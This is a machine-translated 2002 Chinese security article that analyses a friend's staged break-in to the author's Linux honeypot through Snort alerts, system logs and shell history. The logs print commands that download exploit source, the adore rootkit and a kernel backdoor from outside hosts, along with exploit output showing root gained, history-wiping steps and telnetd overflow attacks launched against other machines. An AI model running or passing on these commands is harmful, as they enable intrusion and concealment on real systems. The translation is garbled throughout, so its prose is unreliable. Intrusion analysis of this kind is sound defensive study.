Time invades Xiu's multianalysis |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analysis>> time invades Xiu's 
                  multianalysis  Printing

            Time invades Xiu's multianalysis
            Www.cshu.net  2002-12-16  fog rain village 

              1. Cause 
              This article focuses to mine Linux Honeypot, she is sending out 
              the intermittent aloes wood in the network, tempts the worm and 
              each 
              Lu Kemen presence. In order to let honeypot attractive, all must 
              adopt some processing ways. 
              The near mail tabulates also has had this kind of discussion, has 
              a fellow to say his friend announced in some hacker IRC 
              The honeypot IP address, after a result group of Luo the Mary 
              hacker invades the discovery is a honey pot system, the institute 
              Has the movement all by the complete record, thereupon has been 
              angry, uses distributionally refuses to serve the way crazy 
              retaliation, causes 
              Approaches the network to be paralysed a month long time. 
              Therefore, is tempting intruder's time must be fastidious about 
              the skill. Previous month I once and a friend chatted my method: 
              Establishes a average consumer account number, the password with 
              user, registers in the control bench with this account number, 
              lets him continuously 
              Is in a daze, simultaneously confirmed the system is opening the 
              finger service. Compared with the intruder which remembers past 
              times to finger or the sentiment has 
              The alone clock, attempts finger to leave big pile of user, then 
              the simple guess password enters the system, the expectation can 
              May fear Script Kids make a clear distinction the boundary with 
              the young man. 
              Had not thought friend of mine memory specially good, the matter 
              separates for a month, has not sent the invitation in me in the 
              situation, the light vehicle is ripe 
              The road found honeypot, then has registered with that ordinary 
              account number. 
              Obviously knew this is the honey pot system, all behaviors are all 
              monitored and the record, but also must locally attempt to take 
              root, 
              Installs the back door, attacks other machines as the meat 
              chicken, not is performs in the stage asks the audiences to 
              appreciate? This 
              Is invades a Xiu word the origin. 
              Under lets us observe and emulate this performance together, the 
              source material main origin the system which collects to the diary 
              server 
              The diary, the historical order, as well as Snort takes down 
              conversation process. Certainly, in order to save the length and 
              the protection hides 
              Private has made the partial reduction. Hoped the reader all can 
              have the harvest from respective angle. 
              2. Scanning 
              A Saturday afternoon, Snort reports to the police the prompt to 
              have from the 202.X.X.X SuperScan scanning, the transmission 
              A ICMP Echo data packet test system whether does survive: 
              2002-9-21 16:48 snort [ 1,852 ]: [ 1:474:1 ] ICMP superscan echo [ 
              Classification: Attempted Information Leak ] [ Priority: 2 ]: 
              {ICMP} 202.X.X.X -> 10.0.0.1 
              At the same time, the system diary has recorded port survey which 
              following carries on: 
              Sinbad Technical Publications Page 2 
              2002-9-21 16:48 in.rlogind [ 1,316 ]: Connect from 210.X.X.X 
              2002-9-21 16:48 inetd [ 413 ]: Pid 1318: Exit status 1 
              2002-9-21 16:48 in.rshd [ 1,318 ]: Connect from 210.X.X.X 
              2002-9-21 16:48 in.fingerd [ 1,315 ]: Connect from 210.X.X.X 
              2002-9-21 16:48 in.telnetd [ 1,313 ]: Connect from 210.X.X.X 
              2002-9-21 16:48 rshd [ 1,318 ]: Connection from 210.X.X.X on 
              illegal port 
              2002-9-21 16:48 telnetd [ 1,313 ]: Ttloop: Peer died: EOF 
              2002-9-21 16:48 inetd [ 413 ]: Pid 1316: Exit status 1 
              2002-9-21 16:48 inetd [ 413 ]: Pid 1313: Exit status 1 
              2002-9-21 16:48 sendmail [ 1,314 ]: NOQUEUE: Null connection from 
              [ 210.X.X.X ] 
              2002-9-21 16:48 in.fingerd [ 1,319 ]: Connect from 210.X.X.X 
              2002-9-21 16:48 in.telnetd [ 1,320 ]: Connect from 210.X.X.X 
              Notes does not have, these ports connect the source address 
              transmits ICMP Echo 202.X.X.X, but is 
              210.X.X.X this address. Very obviously, friend of mine has used 
              the TCP/UDP agreement proxy springboard, but 
              ICMP agreement not by this springboard support, therefore his real 
              IP address also exposed. 
              3. This locality exceeds authority to attempt 
              With ease records with mine bait account number tom, a success, 
              the picture enters the oneself home to be same: 
              2002-9-21 16:52 login: LOGIN ON 1 BY tom FROM 210.X.X.X 
              2002-9-21 16:52 PAM_pwdb [ 1,321 ]: (login) session opened for 
              user tom by (uid=0) 
              Glues the way with cat heavy direction detection Canada to 
              transmit section of this locality to exceed authority the script 
              to the system in, please note the time to be bad, he 
              Rummaged through chests and cupboards has spend 4 minutes: 
              2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 w 
              2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 pwd 
              2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 cd.. 
              2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cd tom 
              2002-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cat > 1.sh 
              2002-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 chmod 755 1.sh 
              2002-9-21 16:56 -bash: HISTORY: PID=1322 UID=500. /1.sh 
              2002-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 ls 
              Sinbad Technical Publications Page 3 
              After input. /1.sh execution result? After we inspect Snort the 
              SESSION video recording to discover, department 
              The series because lacks the related storehouse document, has not 
              succeeded. Attention: In the video recording ordered the input 
              each character all to appear 
              Two, this was the terminal returns to reveals the function, Snort 
              is faithful has made the bidirectional recording: 
              [ tom@abc tom ] $.. //11. sshh 
              +-----------------------------------------------------------+ 
              | Linux kernel 2.2.X (X<=15) & sendmail <= 8.10.1 | 
              | local root exploit | 
              | | 
              | Bugs found and exploit wr#tten by Wojciech Purczynski | 
              | wp@elzabsoft.pl cliph/ircnet Vooyec/dalnet | 
              +-----------------------------------------------------------+ 
              Creating temporary directory 
              Creating anti-noexec library (capdrop.c) 
              Compiling anti-noexec library (capdrop.so) 
              Creating suid shell (sush.c) 
              Compiling suid shell (sush.c) 
              Creating shell script 
              Creating own sm.cf 
              Dropping CAP_SETUID and calling sendmail 
              /bin/true: Error in loading shared libraries: /tmp/foo/capdrop.so: 
              Cannot open shared object file: 
              No such file or directory 
              Waiting for suid shell (/tmp/sush) 
              [ tom@abc tom ] $ llss 
              The first attempt defeat, deletes 1.sh, simultaneously stays 
              behind "XXXX reaches this point as soon as swims" the signature. 
              Also is good, knowledge 
              The road was your dry J 
              2002-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 rm -rf 1.sh 
              2002-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 echo haha shi wo 
              XXXX > haha.txt 
              Friend of mine started to stroll, did not look like any harvest: 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd /tmp 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd foo 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls 
              Sinbad Technical Publications Page 4 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd.. 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls -al 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd font-unix 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls -al 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd/ 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd home 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd ftp 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd/ 
              2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 17:01 -bash: HISTORY: PID=1322 UID=500 ps -ef 
              4. Second this locality exceeds authority to attempt 
              Retraded this locality to exceed authority the procedure, after 
              the translation deletes immediately it? 
              2002-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cd ~tom 
              2002-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cat > su.c 
              2002-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c 
              2002-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 rm -rf su.c 
              Originally is translation time made a mistake. In the source code 
              some characters are using the time which the cat heavy direction 
              detection glues leaves 
              Question: 
              [ tom@abc tom ] $ ggcccc - -oo ssuu susu. cc 
              Su.c unterminated character constant 
              Sinbad Technical Publications Page 5 
              Trades plants the way, a vi new document, pastes toward inside: 
              2002-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 vi su.c 
              2002-9-21 17:07 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c 
              This effect was not better, appeared three mistakes. 
              Simultaneously we also note, records losing 
              Enters the order partially to have massively [ A, [ the D 
              character, this actually was in sought with the about key has 
              knocked a moment ago the history 
              The order "gcc o su su.c", looked like he is suffices lazily 
              [ tom@abc tom ] $ [ Avi su.c [ A [ D [ D [ D [ D [ D [ D [ D [ 
              4@rm -rf su.c [ A [ D [ D [ D [ D [ D [ D [ D [ D [ D [ D [ Dls [ 
              K [ A [ D [ Dgcc -o su su.c 
              Su.c unterminated character constant 
              Su.c:523: Unterminated string or character constant 
              Su.c possible real start of unterminated constant 
              Also will leave behind a speech "later to have spatially does 
              again", walked. Weekend afternoon past 5 o'clock, should have the 
              activity: 
              2002-9-21 17:09 -bash: HISTORY: PID=1322 UID=500 ls 
              2002-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 rm -rf * c 
              2002-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 echo kao, yihou 
              you kong zai gao >> haha.txt 
              2002-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 w 
              2002-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 ls -al 
              2002-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 cat bash_history 
              2002-9-21 17:13 -bash: HISTORY: PID=1322 UID=500 cat /etc/passwd 
              2002-9-21 17:16 -bash: HISTORY: PID=1322 UID=500 exit 
              5. Third this locality exceeds authority to attempt 
              After two days, friend of mine came. Is a Monday afternoon, the 
              work hours, looked like his work is not 
              Very busy. This is "does the machine" a race's common 
              characteristic: Has the massive time and the energy. 
              2002-9-23 13:28 in.telnetd [ 5,567 ]: Connect from 210.X.X.X 
              2002-9-23 13:28 PAM_pwdb [ 5,568 ]: (login) session opened for 
              user tom by (uid=0) 
              2002-9-23 13:28 login: LOGIN ON 1 BY tom FROM 210.X.X.X 
              Sinbad Technical Publications Page 6 
              This he has drawn the lesson, attempts with wget directly from 
              on-line downloading, but my system looks like has not installed 
              Wget, or the PATH value is not right, finally he changes to lynx 
              to add the -dump parameter to succeed from domestic 
              The hack.co.za mirror image stand downloaded has exceeded 
              authority procedure su.c using /bin/su, after the translation 
              carries out, finally 
              Has obtained the local root jurisdiction: 
              2002-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 w 
              2002-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 ps -ef 
              2002-9-23 13:32 -bash:HISTORY: PID=5569 UID=500 
              wgethttp://www.safechina.net/www_hack_co_za/redhat/5.1/su.c 
              2002-9-23 13:34 -bash: HISTORY: PID=5569 UID=500 lynx 
              2002-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 lynx 
              -dumphttp://www.safechina.net/www_hack_co_za/redhat/5.1/su.c > 
              su.c 
              2002-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 gcc -o su su.c 
              2002-9-23 13:35 -bash: HISTORY: PID=5569 UID=500. /su 
              Su exploit by XP <xp@xtreme-power.com> 
              Enjoy! 
              Phase 1. Checking paths and write permisions 
              Checking for /usr/bin/msgfmt.. Ok 
              Checking for /usr/bin/objdump.. Ok 
              Checking write permisions on /tmp.. Ok 
              Checking read permisions on /bin/su.. Ok 
              Checking for a valid language... [ using af_ZA ] Ok 
              Checking that /tmp/LC_MESSAGES does not exist.. Ok 
              Phase 2. Calculating eat and pad values 
              ..................................................................... 
              done 
              Eat = 120 and pad = 2 
              Phase 3. Creating evil libc.mo and setting enviroment 
              Vars 
              Phase 4. Getting address of dtors section of /bin/su 
              ......................................... done 
              Dtors is at 0x0804bd3c 
              Phase 5. Compiling suid shell 
              /tmp/xp created Ok 
              Phase 6. Executing /bin/su 
              - Entering rootshell - 
              Sh-2.03# iid 
              Snort also reported to the police prompts him to obtain the root 
              jurisdiction: 
              2002-9-23 13:37 snort [ 1,852 ]: [ 1:498:3 ] ATTACK RESPONSES id 
              check returned root [ Classification: 
              Potentially Bad Traffic ] [ Priority: 2 ]: {TCP} 10.0.0.1:23 -> 
              210.x.x.x:4560 
              Sinbad Technical Publications Page 7 
              6. Installs the back door 
              After the success obtains the highest jurisdiction, friend of mine 
              starts to download adore rootkit and is called sunxkdoor 
              Back door procedure: 
              2002-9-23 13:39 sh: HISTORY: PID=7046 UID=0 lynx 
              -dumphttp://stealth.7350.org/rootkits/adore-0.52.tgz > 1.tgz 
              2002-9-23 13:47 sh: HISTORY: PID=7046 UID=0 lynx 
              -dumphttp://www.sunx.org/mysoft/sunxkdoor.tar > 1.tar 
              But this has been defeated, the heavy directional document all is 
              0 bytes. Because is exceeding authority this shell which obtains 
              Center, lynx certainly cannot the normal work: 
              Sh-2.03# lynx -dumphttp://stealth.7350.org/rootkits/adore-0.52.tgz 
              >> 1.tgz 
              Your terminal lacks the ability to clear the screen or position 
              the cursor. 
              Sh-2.03# llyynnxx --dduummpp 
              http:h//www.sunx.org/mysoft/sunxkdoor.tarttp://www.sunx.org/mysoft/sunxkdoor.tar 
              >> 11. ttarar 
              Your terminal lacks the ability to clear the screen or position 
              the cursor. 
              Sh-2.03# lls s-a l 
              -al 
              Total 4 
              Drwxr-xr-x 2 tom tom 1,024 Sep 22 21:43. 
              Drwxrwxrwt 5 root root 1,024 Sep 22 21:35.. 
              -rw-rw-r-- 1 root root 0 Sep 22 21:43 1.tar 
              -rw-rw-r-- 1 root root 0 Sep 22 21:37 1.tgz 
              -rw-rw-r-- 1 root root 0 Sep 22 21:37 adore.tgz 
              -rwxrwxrwx 1 tom tom 458 Sep 22 21:35 libc.mo 
              -rw-rw-r-- 1 tom tom 428 Sep 22 21:35 libc.po 
              Sh-2.03# rrm m --rrff ** 
              Is defeated after many times, he withdrew from rootshell to return 
              to the normal terminal under, the success distinguished with lynx 
              Downloaded to attack telnet the daemon process the telnetd.c 
              preservation is 1.c, adore the rootkit preservation is 
              1.tgz, the sunxkdoor back door preservation is 2.tar: 
              Sh-2.03# eexxiitt 
              Exit 
              Sinbad Technical Publications Page 8 
              Phase 7. Cleaning enviroment 
              Rm: Cannot unlink `/tmp/xp': Operation not permitted 
              2002-9-23 14:03 -bash: HISTORY: PID=5569 UID=500 lynx 
              -dumphttp://www.linux-secure.net/pliki/e.. lnetd/telnetd.c>; 1.c 
              2002-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 lynx 
              -dumphttp://stealth.7350.org/rootkits/adore-0.52.tgz>; 1.tgz 
              2002-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 ls -al 
              2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 tar zxfv 1.tgz 
              2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 cd adore 
              2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ls 
              2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500. /configure 
              2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 make 
              2002-9-23 14:06 -bash: HISTORY: PID=5569 UID=500 ls 
              2002-9-23 14:07 -bash: HISTORY: PID=5569 UID=500 cd.. 
              2002-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 lynx 
              -dumphttp://www.sunx.org/mysoft/sunxkdoor.tar > 2.tar 
              2002-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ls -al 
              2002-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 export 
              HISTFILE=/dev/null 
              Under starts to install sunxkdoor this LKM the back door, this 
              need root jurisdiction, he moves once more su 
              Exceeds authority the procedure to obtain rootshell, then increase 
              sunxkdoor with insmod, then withdrew from the system use 
              This back door went round registers the process to come in. 
              This back door should has intercepted the original /bin/login 
              transfer, first was telnet arrives the system, in login: Prompt 
              After the symbol inputs sunxkdoor this essential string, the 
              system automatic separation connection; After that again telnet, 
              is direct 
              Obtains root # the number prompt symbol. 
              The attention, he all transferred to the downloading three back 
              doors procedure tom argument to take down in the newly built TOM 
              table of contents. 
              2002-9-23 14:08 -bash: HISTORY: PID=5569 UID=500. /su 
              2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 pwd 
              2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 cd ~tom 
              2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 ls 
              2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 tar xfv 2.tar 
              2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 export 
              HISTFILE=/dev/null 
              2002-9-23 14:12 sh: HISTORY: PID=8570 UID=0 cd sunxkdoor 
              2002-9-23 14:12 sh: HISTORY: PID=8570 UID=0 ls 
              2002-9-23 14:13 sh: HISTORY: PID=8570 UID=0 gcc -O2 -c 
              sunxknlsh_linux_II.c 
              2002-9-23 14:13 sh: HISTORY: PID=8570 UID=0 ls 
              2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 mv 
              sunxknlsh_linux_II.o.. /sun.o 
              2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 cd.. 
              2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 ls 
              2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 w 
              2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 rm -rf sunxkdoor 
              2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls 
              Sinbad Technical Publications Page 9 
              2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mkdir TOM 
              2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mv * TOM 
              2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls 
              2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 cd TOM 
              2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls 
              2002-9-23 14:16 sh: HISTORY: PID=8570 UID=0 insmod 
              2002-9-23 14:16 sh: HISTORY: PID=8570 UID=0 whereis insmod 
              2002-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/insmod sun.o 
              2002-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/lsmod 
              2002-9-23 14:17 sh: HISTORY: PID=8570 UID=0 exit 
              2002-9-23 14:17 -bash: HISTORY: PID=5569 UID=500 exit 
              2002-9-23 14:17 PAM_pwdb [ 5,568 ]: (login) session closed for 
              user tom 
              #'! 
              Red Hat Linux release 6.2 (Zoot) 
              Kernel 2.2.14-5.0 on an i686 
              Login: Ssuunnxkxkddooroor 
              #'! 
              Red Hat Linux release 6.2 (Zoot) 
              Kernel 2.2.14-5.0 on an i686 
              [ root@abc/] # ccd d ~~ttomom 
              [ root@abc tom ] # llss 
              TOM 
              Under starts installs adore, translation time to lack a document, 
              friend of mine or can from Linux 
              In the source code table of contents found and the copy to the 
              adore table of contents in, translated adore. Starts adore 
              After, when hides the TOM table of contents using tool ava, 
              although prompts hidden, but ls time or can look 
              . Friend of mine is very melancholy, possibly is adore and between 
              sunxkdoor these two LKM has the conflict. 
              2002-9-23 14:23 login: HISTORY: PID=8620 UID=0 cd TOM 
              2002-9-23 14:23 login: HISTORY: PID=8260 UID=0 tar zxfv 1.tgz 
              2002-9-23 14:23 login: HISTORY: PID=8260 UID=0 cd adore 
              2002-9-23 14:23 login: HISTORY: PID=8260 UID=0 ls 
              2002-9-23 14:23 login: HISTORY: PID=8260 UID=0. /configure 
              2002-9-23 14:23 login: HISTORY: PID=8260 UID=0 make 
              2002-9-23 14:23 login: HISTORY: PID=8620 UID=0 find/-name 
              spinlock.h 
              2002-9-23 14:24 login: HISTORY: PID=8620 UID=0 cp 
              /usr/src/linux-2.2.14/include/asm-i386/spinlock.h. 
              2002-9-23 14:24 login: HISTORY: PID=8620 UID=0 make 
              2002-9-23 14:24 login: HISTORY: PID=8620 UID=0 ls 
              2002-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv * o../ 
              2002-9-23 14:25 login: HISTORY: PID=8620 UID=0 ls 
              Sinbad Technical Publications Page 10 
              2002-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv ava../ 
              2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 mv startadore../ 
              2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls 
              2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 cd.. 
              2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls 
              2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 rm -rf adore 
              2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 vi startadore 
              2002-9-23 14:29 login: HISTORY: PID=8620 UID=0 ls 
              2002-9-23 14:29 login: HISTORY: PID=8620 UID=0 insmod 
              2002-9-23 14:29 login: HISTORY: PID=8620 UID=0. /startadore 
              2002-9-23 14:30 login: HISTORY: PID=8620 UID=0 mv startadore start 

              2002-9-23 14:30 login: HISTORY: PID=8620 UID=0. /ava 
              2002-9-23 14:30 login: HISTORY: PID=8620 UID=0. /ava h. TOM 
              2002-9-23 14:30 login: HISTORY: PID=8620 UID=0. /ava h.. /TOM 
              2002-9-23 14:30 login: HISTORY: PID=8620 UID=0 cd.. 
              2002-9-23 14:30 login: HISTORY: PID=8620 UID=0 ls 
              7. Attacks the other people as the springboard 
              With the adore success hideaway table of contents, friend of mine 
              suddenly has not remembered own to download 
              Telnetd long-distance overflow script, thereupon the translation 
              preservation is 1, started the experiment, first is attacks this 
              machine, 
              Afterwards changed attacks the male on-line other machines. 
              Theoretically says, honeypot should limit the connection which 
              initiates toward outside, 
              For instance in the identical time connection number, prevented is 
              installed distributionally by the person has rejected the service 
              routine, uses for to attack 
              Other machines, cause the nonessential trouble. My honeypot has 
              not certainly made this aspect the limit, because of me 
              Every day spend the story which the time watches inside her to 
              occur, achieves knows from A to Z J 
              2002-9-23 14:50 login: HISTORY: PID=8699 UID=0. /1 -h 127.0.0.1 
              2002-9-23 14:50 in.telnetd [ 8,774 ]: Connect from 127.0.0.1 
              2002-9-23 14:50 telnetd [ 8,774 ]: Ttloop: Peer died: EOF 
              2002-9-23 14:56 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.230 -t 5 
              2002-9-23 14:58 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.230 
              2002-9-23 14:59 inetd [ 8,783 ]: 2222/tcp: Bind: Address already 
              in use 
              2002-9-23 14:59 inetd [ 8,783 ]: Extra conf for service 2222/tcp 
              (skipped) 
              2002-9-23 15:10 inetd [ 8,783 ]: 2222/tcp: Bind: Address already 
              in use 
              2002-9-23 15:10 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.96 -t 5 
              2002-9-23 15:10 inetd [ 8,793 ]: 2222/tcp: Bind: Address already 
              in use 
              2002-9-23 15:10 inetd [ 8,793 ]: Extra conf for service 2222/tcp 
              (skipped) 
              2002-9-23 15:11 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.106 -t 5 
              2002-9-23 15:11 inetd [ 8,793 ]: Extra conf for service 2222/tcp 
              (skipped) 
              2002-9-23 15:12 inetd [ 8,796 ]: Extra conf for service 2222/tcp 
              (skipped) 
              Sinbad Technical Publications Page 11 
              2002-9-23 15:12 inetd [ 8,796 ]: 2222/tcp: Bind: Address already 
              in use 
              2002-9-23 15:14 last message repeated 2 times 
              2002-9-23 15:14 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.186 -t 3 
              2002-9-23 15:15 inetd [ 8,799 ]: 2222/tcp: Bind: Address already 
              in use 
              2002-9-23 15:15 inetd [ 8,799 ]: Extra conf for service 2222/tcp 
              (skipped) 
              2002-9-23 15:15 snort [ 1,852 ]: [ 1:648:5 ] SHELLCODE x86 NOOP [ 
              Classification: Executable 
              Code was detected ] [ Priority: 1 ]: {TCP} 211.xxx.xxx.186:23 -> 
              10.0.0.1:1053 
              2002-9-23 15:17 last message repeated 3 times 
              2002-9-23 15:17 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.25 -t 4 
              2002-9-23 15:17 inetd [ 8,804 ]: Extra conf for service 2222/tcp 
              (skipped) 
              2002-9-23 15:17 inetd [ 8,804 ]: 2222/tcp: Bind: Address already 
              in use 
              2002-9-23 15:18 last message repeated 4 times 
              2002-9-23 15:18 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.16 -t 5 
              2002-9-23 15:19 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.16 -t 5 
              2002-9-23 15:19 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.15 -t 5 
              2002-9-23 15:20 login: HISTORY: PID=8699 UID=0. /1 -h 
              211.xxx.xxx.226 -t 4 
              Does not have in here me too to pay attention to this overflow 
              script to carry out the result, only was notes the system to 
              produce have been massive 
              The identical strip diary, all occurs after. /1 order execution: 
              2002-9-23 15:20 inetd [ 8,810 ]: 2222/tcp: Bind: Address already 
              in use 
              After the inspection, originally was has opened root jurisdiction 
              shell in the tcp/2222 port! Looked like this overflows 
              Leaves the procedure many the function, but also gives own machine 
              to tie up decides shell 
              After that, I register MSN to relate to that friend, he said the 
              plan conclusion has performed, thereupon I start kill 
              Falls the telnetd overflow procedure which this should die, repair 
              scar countless honeypot lets on her again line. Simultaneously 
              The backup invasion journal file, will hold his handle to prepare 
              the future to blackmail. 
              8. Summary 
              This article introduced tempts intruder's one method, as well as 
              not please from arrives to a friend do exercises or calisthenics 
              does in a detailed way 
              Thin analysis. Including hid real IP, three attempts with the aid 
              of the springboard local exceeds authority finally to succeed, to 
              install two 
              A LKM kind of back door, as well as attacks the other people 
              machine as the springboard. This is a typical invasion worker 
              The work flow, we through analyze these behaviors the detail, may 
              study realizes to the more back doors procedure, 
              The overflow script, the breakdown remove the method, even 
              individual custom and so on some interesting things.


              Original author: . 
              Origin: . 
              Altogether has 383 readers to read this article 

              [Tells friend] 
            Previous article:MYSQL user root password for a spatial method of 
            attack 

            Next article:IDC forecast the next year will have the large-scale 
            network terror attack event 

            - this week popular article - related article 
            The nc.exe high-level skill application compiles
            QQ attack code
            Hacker technology (use of the DEBUG loophole)
            Invades the hypothesized main engine the simple plan
            The local area network winds viral invasion principle and its guard 
            method
            The security receives in OutLook not the security appendix
            NT loophole summary and use



      CSHU 
